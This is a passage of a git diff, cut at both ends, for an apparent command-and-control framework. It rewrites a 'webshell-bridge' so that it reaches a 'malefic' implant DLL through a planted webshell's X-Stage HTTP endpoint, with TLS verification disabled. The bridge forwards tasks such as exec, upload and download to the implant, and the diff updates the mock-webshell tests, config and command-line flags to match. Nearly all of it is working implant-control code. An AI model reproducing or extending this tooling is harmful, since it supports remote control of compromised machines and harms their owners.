NewChannel creates a channel that will connect through the given transport -// to the DLL's malefic bind server at dllAddr (e.g. "127.0.0.1:13338"). -func NewChannel(transport dialTransport, dllAddr, pipelineName string) *Channel { +// NewChannel creates a channel that communicates with the DLL through +// the webshell's X-Stage: spite HTTP endpoint. +func NewChannel(webshellURL, token string) *Channel { return &Channel{ - transport: transport, - dllAddr: dllAddr, - pending: make(map[uint32]chan *implantpb.Spite), - recvDone: make(chan struct{}), - parser: malefic.NewMaleficParser(), + webshellURL: webshellURL, + token: token, + client: &http.Client{ + Timeout: httpTimeout, + Transport: &http.Transport{ + TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, + }, + }, + pending: make(map[uint32]chan *implantpb.Spite), + closeCh: make(chan struct{}), } } -// Connect dials the DLL through suo5. No handshake is performed here; -// malefic bind sends the Register frame immediately after TCP connect. +// Connect verifies the webshell is reachable and the DLL is loaded. func (c *Channel) Connect(ctx context.Context) error { - dialCtx, cancel := context.WithTimeout(ctx, connectTimeout) - defer cancel() - - conn, err := c.transport.DialContext(dialCtx, "tcp", c.dllAddr) + body, err := c.doRequest(ctx, stageStatus, nil) if err != nil { - if dialCtx.Err() != nil { - return fmt.Errorf("connect timeout: %w", dialCtx.Err()) - } - return fmt.Errorf("dial DLL at %s: %w", c.dllAddr, err) + return fmt.Errorf("connect: %w", err) + } + status := string(body) + if status != "LOADED" { + return fmt.Errorf("DLL not loaded (status: %s)", status) } - c.conn = conn return nil } -// Handshake reads the initial registration data from the DLL. -// The malefic bind DLL sends a frame containing Spites{[Spite{Body: Register{...}}]} -// immediately after TCP connect. +// Handshake calls bridge_init on the DLL via the webshell and returns +// the Register message containing SysInfo and module list. func (c *Channel) Handshake() (*implantpb.Register, error) { - sid, length, err := c.parser.ReadHeader(c.conn) + body, err := c.doRequest(context.Background(), stageInit, nil) if err != nil { - return nil, fmt.Errorf("read handshake header: %w", err) - } - - buf := make([]byte, length) - if _, err := io.ReadFull(c.conn, buf); err != nil { - return nil, fmt.Errorf("read handshake payload: %w", err) + return nil, fmt.Errorf("handshake: %w", err) } - - spites, err := c.parser.Parse(buf) - if err != nil { - return nil, fmt.Errorf("parse handshake: %w", err) + if len(body) == 0 { + return nil, fmt.Errorf("empty handshake response") } - if len(spites.GetSpites()) == 0 { - return nil, fmt.Errorf("empty handshake frame") + // First 4 bytes: session ID (little-endian uint32), rest: Register protobuf + if len(body) < 4 { + return nil, fmt.Errorf("handshake response too short: %d bytes", len(body)) } + c.sid = uint32(body[0]) | uint32(body[1])<<8 | uint32(body[2])<<16 | uint32(body[3])<<24 + c.sidSet.Store(true) - spite := spites.GetSpites()[0] - reg := spite.GetRegister() - if reg == nil { - return nil, fmt.Errorf("handshake spite has no Register body") + reg := &implantpb.Register{} + if err := proto.Unmarshal(body[4:], reg); err != nil { + return nil, fmt.Errorf("unmarshal register: %w", err) } - c.sessionID = sid - logs.Log.Debugf("handshake received: sid=%d name=%s modules=%v", sid, reg.Name, reg.Module) + logs.Log.Debugf("handshake: sid=%d name=%s modules=%v", c.sid, reg.Name, reg.Module) return reg, nil } -// StartRecvLoop starts a background goroutine that reads responses from the -// DLL and dispatches them to the appropriate pending channel by taskID. -// Unlike the old single-response model, channels are NOT removed on first -// dispatch — they persist until explicitly closed via CloseStream. -// Must be called after Connect + Handshake. +// StartRecvLoop starts a background polling goroutine that fetches pending +// responses from the DLL for streaming tasks. func (c *Channel) StartRecvLoop() { - go c.recvLoop() + ctx, cancel := context.WithCancel(context.Background()) + c.pollCancel = cancel + go c.pollLoop(ctx) } -func (c *Channel) recvLoop() { - defer close(c.recvDone) +func (c *Channel) pollLoop(ctx context.Context) { + ticker := time.NewTicker(pollInterval) + defer ticker.Stop() + for { - _, length, err := c.parser.ReadHeader(c.conn) - if err != nil { - c.handleRecvLoopExit(err) + select { + case <-ctx.Done(): return - } - - buf := make([]byte, length) - if _, err := io.ReadFull(c.conn, buf); err != nil { - c.handleRecvLoopExit(fmt.Errorf("read payload: %w", err)) + case <-c.closeCh: return - } - - spites, err := c.parser.Parse(buf) - if err != nil { - logs.Log.Debugf("recv loop parse error (skipping frame): %v", err) - continue - } - - // Dispatch each Spite by its TaskId — do NOT delete the channel entry. - for _, spite := range spites.GetSpites() { - taskID := spite.GetTaskId() + case <-ticker.C: c.pendMu.Lock() - ch, ok := c.pending[taskID] + hasPending := len(c.pending) > 0 c.pendMu.Unlock() + if !hasPending { + continue + } - if ok { - select { - case ch <- spite: - default: - logs.Log.Debugf("recv loop: channel full for task %d, dropping", taskID) + empty := &implantpb.Spites{} + data, err := proto.Marshal(empty) + if err != nil { + continue + } + respBody, err := c.doRequest(ctx, stageSpite, data) + if err != nil { + if ctx.Err() != nil { + return } - } else { - logs.Log.Debugf("recv loop: no waiter for task %d", taskID) + logs.Log.Debugf("poll error: %v", err) + continue } + c.dispatchResponse(respBody) } } } -func (c *Channel) handleRecvLoopExit(err error) { - c.closeMu.Lock() - closed := c.closed - c.closeMu.Unlock() - if !closed { - logs.Log.Debugf("recv loop error: %v", err) +// Forward sends a Spite and waits for a single response (unary request-response). +func (c *Channel) Forward(taskID uint32, spite *implantpb.Spite) (*implantpb.Spite, error) { + if c.closed.Load() { + return nil, fmt.Errorf("channel closed") } - // Close all pending channels to signal EOF to waiters. - c.pendMu.Lock() - c.recvErr = err - for id, ch := range c.pending { - close(ch) - delete(c.pending, id) + + spite.TaskId = taskID + spites := &implantpb.Spites{Spites: []*implantpb.Spite{spite}} + data, err := proto.Marshal(spites) + if err != nil { + return nil, fmt.Errorf("marshal spite: %w", err) } - c.pendMu.Unlock() + + respBody, err := c.doRequest(context.Background(), stageSpite, data) + if err != nil { + return nil, fmt.Errorf("forward: %w", err) + } + + respSpites := &implantpb.Spites{} + if err := proto.Unmarshal(respBody, respSpites); err != nil { + return nil, fmt.Errorf("unmarshal response: %w", err) + } + + for _, s := range respSpites.GetSpites() { + if s.GetTaskId() == taskID { + return s, nil + } + } + + if len(respSpites.GetSpites()) > 0 { + for _, s := range respSpites.GetSpites() { + c.dispatchSpite(s) + } + } + + return nil, fmt.Errorf("no response for task %d", taskID) } -// OpenStream registers a buffered response channel for taskID and returns the read end. -// The channel receives all DLL responses for this taskID until CloseStream is called -// or the recvLoop exits (which closes the channel). +// OpenStream registers a persistent response channel for streaming tasks. func (c *Channel) OpenStream(taskID uint32) <-chan *implantpb.Spite { ch := make(chan *implantpb.Spite, streamChanBuffer) c.pendMu.Lock() @@ -190,41 +218,34 @@ func (c *Channel) OpenStream(taskID uint32) <-chan *implantpb.Spite { return ch } -// SendSpite sends a single spite to the DLL for the given taskID. -// Thread-safe: multiple goroutines can call SendSpite concurrently. +// SendSpite sends a spite to the DLL via the webshell. func (c *Channel) SendSpite(taskID uint32, spite *implantpb.Spite) error { - c.closeMu.Lock() - if c.closed || c.conn == nil { - c.closeMu.Unlock() + if c.closed.Load() { return fmt.Errorf("channel closed") } - c.closeMu.Unlock() spite.TaskId = taskID spites := &implantpb.Spites{Spites: []*implantpb.Spite{spite}} + data, err := proto.Marshal(spites) + if err != nil { + return fmt.Errorf("marshal: %w", err) + } - data, err := c.parser.Marshal(spites, c.sessionID) + respBody, err := c.doRequest(context.Background(), stageSpite, data) if err != nil { - return fmt.Errorf("marshal spite: %w", err) + return err } - c.writeMu.Lock() - _, err = c.conn.Write(data) - c.writeMu.Unlock() - return err + c.dispatchResponse(respBody) + return nil } -// CloseStream removes the pending channel for taskID. -// Does NOT close the channel itself to avoid send-on-closed-channel panic -// if recvLoop is concurrently dispatching. func (c *Channel) CloseStream(taskID uint32) { c.pendMu.Lock() delete(c.pending, taskID) c.pendMu.Unlock() } -// CloseAllStreams closes and removes all pending channels. -// Safe to call during teardown (holds pendMu for the entire operation). func (c *Channel) CloseAllStreams() { c.pendMu.Lock() for id, ch := range c.pending { @@ -234,40 +255,82 @@ func (c *Channel) CloseAllStreams() { c.pendMu.Unlock() } -// Forward sends a Spite request to the DLL and waits for a single response. -// Convenience wrapper over OpenStream + SendSpite + CloseStream for unary tasks. -func (c *Channel) Forward(taskID uint32, spite *implantpb.Spite) (*implantpb.Spite, error) { - ch := c.OpenStream(taskID) +func (c *Channel) SessionID() uint32 { return c.sid } + +func (c *Channel) IsClosed() bool { return c.closed.Load() } + +// WithSecure is a no-op. Use HTTPS for transport security. +func (c *Channel) WithSecure(_ *clientpb.KeyPair) {} + +func (c *Channel) Close() error { + if c.closed.Swap(true) { + return nil + } + close(c.closeCh) + if c.pollCancel != nil { + c.pollCancel() + } + c.CloseAllStreams() + return nil +} + +func (c *Channel) doRequest(ctx context.Context, stage string, body []byte) ([]byte, error) { + var bodyReader io.Reader + if body != nil { + bodyReader = bytes.NewReader(body) + } - if err := c.SendSpite(taskID, spite); err != nil { - c.CloseStream(taskID) + req, err := http.NewRequestWithContext(ctx, "POST", c.webshellURL, bodyReader) + if err != nil { + return nil, err + } + req.Header.Set(headerStage, stage) + if c.token != "" { + req.Header.Set(headerToken, c.token) + } + if c.sidSet.Load() { + req.Header.Set(headerSessionID, fmt.Sprintf("%d", c.sid)) + } + req.Header.Set("Content-Type", "application/octet-stream") + + resp, err := c.client.Do(req) + if err != nil { return nil, err } + defer resp.Body.Close() - resp, ok := <-ch - c.CloseStream(taskID) - if !ok { - return nil, fmt.Errorf("channel closed during forward") + if resp.StatusCode != http.StatusOK { + respBody, _ := io.ReadAll(resp.Body) + return nil, fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(respBody)) } - return resp, nil -} -// WithSecure enables Age encryption/decryption on the malefic wire protocol. -func (c *Channel) WithSecure(keyPair *clientpb.KeyPair) { - c.parser.WithSecure(keyPair) + return io.ReadAll(resp.Body) } -// Close shuts down the malefic connection. -func (c *Channel) Close() error { - c.closeMu.Lock() - defer c.closeMu.Unlock() - - if c.closed { - return nil +func (c *Channel) dispatchResponse(body []byte) { + if len(body) == 0 { + return } - c.closed = true - if c.conn != nil { - return c.conn.Close() + spites := &implantpb.Spites{} + if err := proto.Unmarshal(body, spites); err != nil { + logs.Log.Debugf("dispatch unmarshal error: %v", err) + return + } + for _, spite := range spites.GetSpites() { + c.dispatchSpite(spite) + } +} + +func (c *Channel) dispatchSpite(spite *implantpb.Spite) { + taskID := spite.GetTaskId() + c.pendMu.Lock() + ch, ok := c.pending[taskID] + c.pendMu.Unlock() + if ok { + select { + case ch <- spite: + default: + logs.Log.Debugf("channel: pending full for task %d", taskID) + } } - return nil } diff --git a/server/cmd/webshell-bridge/channel_test.go b/server/cmd/webshell-bridge/channel_test.go index 46635264..1563b84a 100644 --- a/server/cmd/webshell-bridge/channel_test.go +++ b/server/cmd/webshell-bridge/channel_test.go @@ -1,91 +1,29 @@ package main import ( - "bytes" "encoding/binary" "io" - "net" + "net/http" + "net/http/httptest" "sync" "testing" "time" - "github.com/chainreactors/IoM-go/consts" "github.com/chainreactors/IoM-go/proto/implant/implantpb" - "github.com/chainreactors/malice-network/helper/utils/compress" - malefic "github.com/chainreactors/malice-network/server/internal/parser/malefic" - "github.com/gookit/config/v2" "google.golang.org/protobuf/proto" ) -func init() { - // Initialize config for the malefic parser's packet length check. - config.Set(consts.ConfigMaxPacketLength, 10*1024*1024) -} - -// testWriteMaleficFrame writes a malefic-framed message to conn for test use. -func testWriteMaleficFrame(conn net.Conn, spites *implantpb.Spites, sid uint32) error { - data, err := proto.Marshal(spites) - if err != nil { - return err - } - data, err = compress.Compress(data) - if err != nil { - return err - } - var buf bytes.Buffer - buf.WriteByte(malefic.DefaultStartDelimiter) - binary.Write(&buf, binary.LittleEndian, sid) - binary.Write(&buf, binary.LittleEndian, int32(len(data))) - buf.Write(data) - buf.WriteByte(malefic.DefaultEndDelimiter) - _, err = conn.Write(buf.Bytes()) - return err -} - -// testReadMaleficFrame reads a malefic-framed message from conn for test use. -func testReadMaleficFrame(conn net.Conn) (uint32, *implantpb.Spites, error) { - header := make([]byte, malefic.HeaderLength) - if _, err := io.ReadFull(conn, header); err != nil { - return 0, nil, err - } - if header[0] != malefic.DefaultStartDelimiter { - return 0, nil, io.ErrUnexpectedEOF - } - sid := binary.LittleEndian.Uint32(header[1:5]) - length := binary.LittleEndian.Uint32(header[5:9]) - buf := make([]byte, length+1) - if _, err := io.ReadFull(conn, buf); err != nil { - return 0, nil, err - } - payload := buf[:length] - decompressed, err := compress.Decompress(payload) - if err != nil { - decompressed = payload - } - spites := &implantpb.Spites{} - if err := proto.Unmarshal(decompressed, spites); err != nil { - return 0, nil, err - } - return sid, spites, nil -} - -// mockMaleficDLL simulates a malefic bind DLL. -// It accepts one connection, sends a Register handshake frame, -// then echoes Spite requests back with a modified Name field. -type mockMaleficDLL struct { - ln net.Listener +// mockWebshell simulates the webshell's X-Stage endpoints for testing. +type mockWebshell struct { register *implantpb.Register sessionID uint32 + + mu sync.Mutex + handler func(stage string, body []byte) ([]byte, int) // custom handler } -func newMockMaleficDLL(t *testing.T) *mockMaleficDLL { - t.Helper() - ln, err := net.Listen("tcp", "127.0.0.1:0") - if err != nil { - t.Fatalf("mock DLL listen: %v", err) - } - return &mockMaleficDLL{ - ln: ln, +func newMockWebshell() *mockWebshell { + return &mockWebshell{ sessionID: 42, register: &implantpb.Register{ Name: "test-dll", @@ -99,110 +37,99 @@ func newMockMaleficDLL(t *testing.T) *mockMaleficDLL { } } -func (m *mockMaleficDLL) addr() string { - return m.ln.Addr().String() -} - -func (m *mockMaleficDLL) close() { - m.ln.Close() -} +func (m *mockWebshell) ServeHTTP(w http.ResponseWriter, r *http.Request) { + stage := r.Header.Get("X-Stage") + body, _ := io.ReadAll(r.Body) -// serve handles one client connection through the full malefic protocol. -func (m *mockMaleficDLL) serve(t *testing.T, handleN int) { - t.Helper() - conn, err := m.ln.Accept() - if err != nil { - t.Errorf("mock DLL accept: %v", err) - return - } - defer conn.Close() + m.mu.Lock() + handler := m.handler + m.mu.Unlock() - // Send Register handshake as malefic frame - regSpite := &implantpb.Spites{ - Spites: []*implantpb.Spite{ - { - Body: &implantpb.Spite_Register{Register: m.register}, - }, - }, - } - if err := testWriteMaleficFrame(conn, regSpite, m.sessionID); err != nil { - t.Errorf("mock DLL send handshake: %v", err) + if handler != nil { + respBody, status := handler(stage, body) + if status != 0 { + w.WriteHeader(status) + } + if respBody != nil { + w.Write(respBody) + } return } - // Echo Spite requests back with modified Name - for i := 0; i < handleN; i++ { - sid, spites, err := testReadMaleficFrame(conn) - if err != nil { - t.Errorf("mock DLL read spite: %v", err) - return + switch stage { + case "status": + w.Write([]byte("LOADED")) + case "init": + regData, _ := proto.Marshal(m.register) + sid := make([]byte, 4) + binary.LittleEndian.PutUint32(sid, m.sessionID) + w.Write(sid) + w.Write(regData) + case "spite": + // Echo: parse input Spites, modify Name, return + inSpites := &implantpb.Spites{} + if len(body) > 0 { + proto.Unmarshal(body, inSpites) } - - respSpites := &implantpb.Spites{} - for _, spite := range spites.GetSpites() { - respSpites.Spites = append(respSpites.Spites, &implantpb.Spite{ - Name: "resp:" + spite.Name, - TaskId: spite.TaskId, + outSpites := &implantpb.Spites{} + for _, s := range inSpites.GetSpites() { + outSpites.Spites = append(outSpites.Spites, &implantpb.Spite{ + Name: "resp:" + s.Name, + TaskId: s.TaskId, }) } - if err := testWriteMaleficFrame(conn, respSpites, sid); err != nil { - t.Errorf("mock DLL send response: %v", err) - return - } + data, _ := proto.Marshal(outSpites) + w.Write(data) + default: + w.WriteHeader(404) } } -// dialMockDLL connects to the mock DLL and returns a Channel ready for Handshake/Forward. -func dialMockDLL(t *testing.T, addr string) *Channel { +func (m *mockWebshell) setHandler(h func(string, []byte) ([]byte, int)) { + m.mu.Lock() + m.handler = h + m.mu.Unlock() +} + +func startMockWebshell(t *testing.T) (*httptest.Server, *mockWebshell) { t.Helper() - conn, err := net.DialTimeout("tcp", addr, 5*time.Second) - if err != nil { - t.Fatalf("dial mock DLL: %v", err) - } - return &Channel{ - conn: conn, - dllAddr: addr, - pending: make(map[uint32]chan *implantpb.Spite), - recvDone: make(chan struct{}), - parser: malefic.NewMaleficParser(), - } + mock := newMockWebshell() + srv := httptest.NewServer(mock) + t.Cleanup(srv.Close) + return srv, mock } func TestChannelConnect(t *testing.T) { - mock := newMockMaleficDLL(t) - defer mock.close() + srv, _ := startMockWebshell(t) + ch := NewChannel(srv.URL, "") + defer ch.Close() - // Accept the connection in background - accepted := make(chan struct{}) - go func() { - conn, err := mock.ln.Accept() - if err != nil { - return + if err := ch.Connect(t.Context()); err != nil { + t.Fatalf("connect: %v", err) + } +} + +func TestChannelConnectNotLoaded(t *testing.T) { + srv, mock := startMockWebshell(t) + mock.setHandler(func(stage string, body []byte) ([]byte, int) { + if stage == "status" { + return []byte("NOT_LOADED"), 200 } - conn.Close() - close(accepted) - }() + return nil, 404 + }) - conn, err := net.DialTimeout("tcp", mock.addr(), 5*time.Second) - if err != nil { - t.Fatalf("dial: %v", err) - } - conn.Close() + ch := NewChannel(srv.URL, "") + defer ch.Close() - select { - case <-accepted: - case <-time.After(time.Second): - t.Fatal("connection not accepted") + err := ch.Connect(t.Context()) + if err == nil { + t.Fatal("expected error for NOT_LOADED") } } func TestChannelHandshake(t *testing.T) { - mock := newMockMaleficDLL(t) - defer mock.close() - - go mock.serve(t, 0) // Handshake only - - ch := dialMockDLL(t, mock.addr()) + srv, _ := startMockWebshell(t) + ch := NewChannel(srv.URL, "") defer ch.Close() reg, err := ch.Handshake() @@ -219,323 +146,124 @@ func TestChannelHandshake(t *testing.T) { if reg.Sysinfo == nil || reg.Sysinfo.Os == nil || reg.Sysinfo.Os.Name != "Windows" { t.Errorf("expected Windows sysinfo, got %+v", reg.Sysinfo) } - if ch.sessionID != 42 { - t.Errorf("expected sessionID 42, got %d", ch.sessionID) + if ch.SessionID() != 42 { + t.Errorf("expected sessionID 42, got %d", ch.SessionID()) } } func TestChannelForward(t *testing.T) { - mock := newMockMaleficDLL(t) - defer mock.close() - - go mock.serve(t, 2) // Handshake + 2 Spite roundtrips - - ch := dialMockDLL(t, mock.addr()) + srv, _ := startMockWebshell(t) + ch := NewChannel(srv.URL, "") defer ch.Close() if _, err := ch.Handshake(); err != nil { t.Fatalf("handshake: %v", err) } - ch.StartRecvLoop() - - // Forward Spite #1 - resp1, err := ch.Forward(1, &implantpb.Spite{Name: "exec"}) - if err != nil { - t.Fatalf("forward #1: %v", err) - } - if resp1.Name != "resp:exec" { - t.Errorf("expected 'resp:exec', got %q", resp1.Name) - } - - // Forward Spite #2 - resp2, err := ch.Forward(2, &implantpb.Spite{Name: "upload"}) + resp, err := ch.Forward(1, &implantpb.Spite{Name: "exec"}) if err != nil { - t.Fatalf("forward #2: %v", err) + t.Fatalf("forward: %v", err) } - if resp2.Name != "resp:upload" { - t.Errorf("expected 'resp:upload', got %q", resp2.Name) + if resp.Name != "resp:exec" { + t.Errorf("expected 'resp:exec', got %q", resp.Name) } } -func TestChannelForwardBatch(t *testing.T) { - // Test that recvLoop correctly dispatches a batch response - // (one malefic frame containing multiple Spites). - mock := newMockMaleficDLL(t) - defer mock.close() - - go func() { - conn, err := mock.ln.Accept() - if err != nil { - return - } - defer conn.Close() - - // Send handshake - regSpite := &implantpb.Spites{ - Spites: []*implantpb.Spite{ - {Body: &implantpb.Spite_Register{Register: mock.register}}, - }, - } - testWriteMaleficFrame(conn, regSpite, mock.sessionID) - - // Read two individual requests - var requests []*implantpb.Spite - for i := 0; i < 2; i++ { - _, spites, err := testReadMaleficFrame(conn) - if err != nil { - return - } - requests = append(requests, spites.GetSpites()...) - } - - // Respond with a single batch frame containing both responses - batchResp := &implantpb.Spites{} - for _, req := range requests { - batchResp.Spites = append(batchResp.Spites, &implantpb.Spite{ - Name: "resp:" + req.Name, - TaskId: req.TaskId, - }) - } - testWriteMaleficFrame(conn, batchResp, mock.sessionID) - }() - - ch := dialMockDLL(t, mock.addr()) +func TestChannelForwardMultiple(t *testing.T) { + srv, _ := startMockWebshell(t) + ch := NewChannel(srv.URL, "") defer ch.Close() if _, err := ch.Handshake(); err != nil { t.Fatalf("handshake: %v", err) } - ch.StartRecvLoop() - - // Send two requests concurrently - var wg sync.WaitGroup - results := make(map[uint32]string) - var mu sync.Mutex - for _, tc := range []struct { - id uint32 - name string - }{ - {10, "exec"}, - {20, "download"}, - } { - wg.Add(1) - go func(id uint32, name string) { - defer wg.Done() - resp, err := ch.Forward(id, &implantpb.Spite{Name: name}) - if err != nil { - t.Errorf("forward %d: %v", id, err) - return - } - mu.Lock() - results[id] = resp.Name - mu.Unlock() - }(tc.id, tc.name) - } - - wg.Wait() - - if results[10] != "resp:exec" { - t.Errorf("task 10: expected 'resp:exec', got %q", results[10]) - } - if results[20] != "resp:download" { - t.Errorf("task 20: expected 'resp:download', got %q", results[20]) - } -} - -func TestChannelStreamMultipleResponses(t *testing.T) { - // Test that OpenStream receives multiple responses for the same taskID - // without the channel being removed after the first one. - mock := newMockMaleficDLL(t) - defer mock.close() - - const taskID uint32 = 100 - const numResponses = 3 - - go func() { - conn, err := mock.ln.Accept() + for i, name := range []string{"exec", "upload", "download"} { + resp, err := ch.Forward(uint32(i+1), &implantpb.Spite{Name: name}) if err != nil { - return - } - defer conn.Close() - - // Send handshake - regSpite := &implantpb.Spites{ - Spites: []*implantpb.Spite{ - {Body: &implantpb.Spite_Register{Register: mock.register}}, - }, + t.Fatalf("forward %d: %v", i, err) } - testWriteMaleficFrame(conn, regSpite, mock.sessionID) - - // Read the initial request - testReadMaleficFrame(conn) - - // Send multiple responses for the same taskID in separate frames - for i := 0; i < numResponses; i++ { - resp := &implantpb.Spites{ - Spites: []*implantpb.Spite{ - { - Name: "chunk:" + string(rune('A'+i)), - TaskId: taskID, - }, - }, - } - if err := testWriteMaleficFrame(conn, resp, mock.sessionID); err != nil { - return - } + expected := "resp:" + name + if resp.Name != expected { + t.Errorf("task %d: expected %q, got %q", i+1, expected, resp.Name) } - }() - - ch := dialMockDLL(t, mock.addr()) - defer ch.Close() - - if _, err := ch.Handshake(); err != nil { - t.Fatalf("handshake: %v", err) } +} - // Open a persistent stream for this task - respCh := ch.OpenStream(taskID) - ch.StartRecvLoop() - - // Send the initial request - if err := ch.SendSpite(taskID, &implantpb.Spite{Name: "start-stream"}); err != nil { - t.Fatalf("send spite: %v", err) +func TestChannelCloseIdempotent(t *testing.T) { + ch := NewChannel("http://localhost:1", "") + if err := ch.Close(); err != nil { + t.Fatalf("first close: %v", err) } - - // Collect all responses - var received []string - for i := 0; i < numResponses; i++ { - select { - case spite, ok := <-respCh: - if !ok { - t.Fatalf("channel closed after %d responses", i) - } - received = append(received, spite.Name) - case <-time.After(2 * time.Second): - t.Fatalf("timeout waiting for response %d", i) - } + if err := ch.Close(); err != nil { + t.Fatalf("second close: %v", err) } +} - if len(received) != numResponses { - t.Fatalf("expected %d responses, got %d", numResponses, len(received)) - } - for i, name := range received { - expected := "chunk:" + string(rune('A'+i)) - if name != expected { - t.Errorf("response %d: expected %q, got %q", i, expected, name) - } - } +func TestChannelForwardAfterClose(t *testing.T) { + ch := NewChannel("http://localhost:1", "") + ch.Close() - ch.CloseStream(taskID) + _, err := ch.Forward(1, &implantpb.Spite{Name: "exec"}) + if err == nil { + t.Fatal("expected error forwarding on closed channel") + } } -func TestChannelCloseStream(t *testing.T) { - // Verify that CloseStream removes the channel so subsequent dispatches - // are dropped (logged as "no waiter"). - mock := newMockMaleficDLL(t) - defer mock.close() - - const taskID uint32 = 200 +func TestChannelStreamDispatch(t *testing.T) { + srv, mock := startMockWebshell(t) - go func() { - conn, err := mock.ln.Accept() - if err != nil { - return + var callCount int + var mu sync.Mutex + mock.setHandler(func(stage string, body []byte) ([]byte, int) { + if stage == "status" { + return []byte("LOADED"), 200 } - defer conn.Close() - - // Handshake - regSpite := &implantpb.Spites{ - Spites: []*implantpb.Spite{ - {Body: &implantpb.Spite_Register{Register: mock.register}}, - }, + if stage == "init" { + regData, _ := proto.Marshal(mock.register) + sid := make([]byte, 4) + binary.LittleEndian.PutUint32(sid, mock.sessionID) + return append(sid, regData...), 200 } - testWriteMaleficFrame(conn, regSpite, mock.sessionID) - - // Read initial request - testReadMaleficFrame(conn) - - // Send first response - testWriteMaleficFrame(conn, &implantpb.Spites{ - Spites: []*implantpb.Spite{{Name: "first", TaskId: taskID}}, - }, mock.sessionID) - - // Small delay for CloseStream to execute - time.Sleep(100 * time.Millisecond) + if stage == "spite" { + mu.Lock() + callCount++ + n := callCount + mu.Unlock() - // Send second response (should be dropped after CloseStream) - testWriteMaleficFrame(conn, &implantpb.Spites{ - Spites: []*implantpb.Spite{{Name: "second", TaskId: taskID}}, - }, mock.sessionID) - }() + // First call: return a streaming response + if n <= 3 { + resp := &implantpb.Spites{ + Spites: []*implantpb.Spite{{ + Name: "stream-chunk", + TaskId: 100, + }}, + } + data, _ := proto.Marshal(resp) + return data, 200 + } + // After that: empty + empty, _ := proto.Marshal(&implantpb.Spites{}) + return empty, 200 + } + return nil, 404 + }) - ch := dialMockDLL(t, mock.addr()) + ch := NewChannel(srv.URL, "") defer ch.Close() - if _, err := ch.Handshake(); err != nil { - t.Fatalf("handshake: %v", err) - } - - respCh := ch.OpenStream(taskID) + respCh := ch.OpenStream(100) ch.StartRecvLoop() - if err := ch.SendSpite(taskID, &implantpb.Spite{Name: "req"}); err != nil { - t.Fatalf("send: %v", err) - } - - // Receive first response + // Wait for poll to deliver a response select { case spite := <-respCh: - if spite.Name != "first" { - t.Errorf("expected 'first', got %q", spite.Name) + if spite.Name != "stream-chunk" { + t.Errorf("expected 'stream-chunk', got %q", spite.Name) } - case <-time.After(2 * time.Second): - t.Fatal("timeout waiting for first response") + case <-time.After(3 * time.Second): + t.Fatal("timeout waiting for streamed response") } - // Close the stream - ch.CloseStream(taskID) - - // Second response should be dropped — the channel should not receive it. - // Wait briefly to let the mock DLL send it. - time.Sleep(200 * time.Millisecond) - - select { - case _, ok := <-respCh: - if ok { - t.Error("received unexpected response after CloseStream") - } - default: - // Expected: nothing in channel - } -} - -func TestChannelCloseIdempotent(t *testing.T) { - ch := &Channel{ - pending: make(map[uint32]chan *implantpb.Spite), - recvDone: make(chan struct{}), - parser: malefic.NewMaleficParser(), - } - - if err := ch.Close(); err != nil { - t.Fatalf("close without conn: %v", err) - } - if err := ch.Close(); err != nil { - t.Fatalf("double close: %v", err) - } -} - -func TestChannelForwardAfterClose(t *testing.T) { - ch := &Channel{ - closed: true, - pending: make(map[uint32]chan *implantpb.Spite), - recvDone: make(chan struct{}), - parser: malefic.NewMaleficParser(), - } - - _, err := ch.Forward(1, &implantpb.Spite{Name: "exec"}) - if err == nil { - t.Fatal("expected error forwarding on closed channel") - } + ch.CloseStream(100) } diff --git a/server/cmd/webshell-bridge/config.go b/server/cmd/webshell-bridge/config.go index 800a9d43..0775a376 100644 --- a/server/cmd/webshell-bridge/config.go +++ b/server/cmd/webshell-bridge/config.go @@ -8,6 +8,21 @@ type Config struct { ListenerIP string // listener external IP PipelineName string // pipeline name Suo5URL string // suo5 webshell URL (e.g. suo5://target/suo5.jsp) - DLLAddr string // target-side malefic bind DLL address (e.g. 127.0.0.1:13338) + StageToken string // auth token for X-Stage requests (must match webshell's STAGE_TOKEN) Debug bool // enable debug logging } + +// WebshellHTTPURL converts the suo5:// URL to an http(s):// URL. +func (c *Config) WebshellHTTPURL() string { + if len(c.Suo5URL) < 6 { + return c.Suo5URL + } + switch { + case len(c.Suo5URL) > 6 && c.Suo5URL[:6] == "suo5s:": + return "https:" + c.Suo5URL[6:] + case len(c.Suo5URL) > 5 && c.Suo5URL[:5] == "suo5:": + return "http:" + c.Suo5URL[5:] + default: + return c.Suo5URL + } +} diff --git a/server/cmd/webshell-bridge/main.go b/server/cmd/webshell-bridge/main.go index 443aa74f..62eb1232 100644 --- a/server/cmd/webshell-bridge/main.go +++ b/server/cmd/webshell-bridge/main.go @@ -8,9 +8,7 @@ import ( "os/signal" "syscall" - "github.com/chainreactors/IoM-go/consts" "github.com/chainreactors/logs" - "github.com/gookit/config/v2" ) func main() { @@ -21,12 +19,12 @@ func main() { flag.StringVar(&cfg.ListenerIP, "ip", "127.0.0.1", "listener external IP") flag.StringVar(&cfg.PipelineName, "pipeline", "", "pipeline name (auto-generated if empty)") flag.StringVar(&cfg.Suo5URL, "suo5", "", "suo5 webshell URL (e.g. suo5://target/suo5.jsp)") - flag.StringVar(&cfg.DLLAddr, "dll-addr", "127.0.0.1:13338", "target-side malefic bind DLL address") + flag.StringVar(&cfg.StageToken, "token", "", "auth token matching webshell's STAGE_TOKEN") flag.BoolVar(&cfg.Debug, "debug", false, "enable debug logging") flag.Parse() if cfg.AuthFile == "" || cfg.Suo5URL == "" { - fmt.Fprintf(os.Stderr, "Usage: webshell-bridge --auth --suo5 \n") + fmt.Fprintf(os.Stderr, "Usage: webshell-bridge --auth --suo5 --token \n") flag.PrintDefaults() os.Exit(1) } @@ -42,7 +40,6 @@ func main() { ctx, cancel := context.WithCancel(context.Background()) defer cancel() - // Handle graceful shutdown sigCh := make(chan os.Signal, 1) signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM) go func() { @@ -51,9 +48,6 @@ func main() { cancel() }() - // Initialize packet length config for the malefic parser. - config.Set(consts.ConfigMaxPacketLength, 10*1024*1024) - bridge, err := NewBridge(cfg) if err != nil { logs.Log.Errorf("failed to create bridge: %v", err) diff --git a/server/cmd/webshell-bridge/session.go b/server/cmd/webshell-bridge/session.go index 2bd4cd4e..14cce93c 100644 --- a/server/cmd/webshell-bridge/session.go +++ b/server/cmd/webshell-bridge/session.go @@ -19,7 +19,7 @@ type Session struct { PipelineID string ListenerID string - channel *Channel + channel ChannelIface } // NewSession reads the malefic handshake from the DLL (SysInfo + Modules) @@ -28,7 +28,7 @@ func NewSession( 